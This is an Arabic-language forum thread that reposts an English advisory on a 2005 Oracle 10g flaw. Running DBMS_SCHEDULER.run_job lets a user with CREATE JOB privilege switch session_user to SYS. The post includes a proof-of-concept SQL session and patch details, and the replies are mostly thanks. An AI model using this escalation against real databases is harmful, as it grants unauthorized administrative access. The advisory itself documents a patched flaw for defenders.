اثناء تجوالي(بتعرفو انا بسافر كثير ) في احد المواقع (الاجنبية طبعا لان المعلومة عن الاوراكل في المواقع العربية ستكون هنا اولا) لفت انتباهي موضوع عن وجود ثغرة تمت ترقيتها في 5/ 2005 واحنا ما معنا خبر

المهم الثغر مش بسيطة فهي تقوم بتحويلالمستخدم العادي الى اليوزر sys نعم sys


وهذا مفاد المقال

DBMS_SCHEDULER SESSION_USER issue in Oracle 10g

Name	 DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected	 Oracle 10g
Severity	 Medium Risk
Category	 Switch Oracle Username to user SYS
Vendor URL	 http://www.oracle.com/
Credit	 Oracle Metalink Forum 633336.995
Exploit	 Forum Entry removed by Oracle
Date	 07 May 2005 (V 1.02)
VU#	 176909

Details

The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.

Example
Connect as a user with CREATE job privilege

SQL> select user from dual;

USER
---------
JOBUSER

SQL> execute dbms_scheduler.run_job('ANY_JOB');

PL/SQL procedure successfully completed.

SQL> select user from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','session_user')) from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','current_user')) from dual;

USER
---------
JOBUSER

SQL> show user

USER is "jobuser"



Patch Information
Apply the patches for Oracle Critical Patch Update October 2005.


History
05-may-2005 US CERT VU# added (V1.01)
07-may-2005 Oracle removed the forum entry from Metalink (V1.02)
18-oct-2005 Oracle released CPU October 2005

تحياتي

تم تعديل 28 مايو 200718 سنة بواسطة moody_4u

معلومه رائعه جداً...
الصحيح...الكمال لله.... ويكثر خيرك يا مبدع

السلام عليكم
شكرا اخي
موضوعك زادني حبا للاوراكل
شكرا جزيلا

الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام

And there is some thing else
when i grant sysdba to a user
and when connect using that user as sysdba
when i check for the user show user
i get SYS not th euser i conneted with
is that normal.

شكرا مودى على معلوماتك القيمه ......وياريت متبخلش عننا باى معلومات

السلام عليكم
انا حاولت اجرب لكن ما قدرت
لو في واحد جرب يورينا

اخوي الموضوع واضح... هذا كان في اصدار 10g ما قبل التعديل 10.1.0.3

معلومة هامة جدا
نور الله دربك

شكرا على المعلومه

معلومة أكثر من رائعة

معلومه رائعه جداً...
الصحيح...الكمال لله.... ويكثر خيرك يا مبدع

الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام

Yest that's normal

جزاك الله خير ونور بصيرتك

T H A N K 'S

M O O O D y

جميل جدا

جزاك الله الف خير
لكن المهم هل تم معالجتها في الإصدار الأخير أم لا؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

السلام عليكم ورحمة الله وبركاته
شكرا أخي علي هذه المعلومة

يسلمووووووو أخي على المعلومة
بس انا ما بعرف ايش تقصد sys وبالاخص أني مبتدئة بالاوراكل

الف شكر يا اخوي والله يزيد الكرماء من امثالك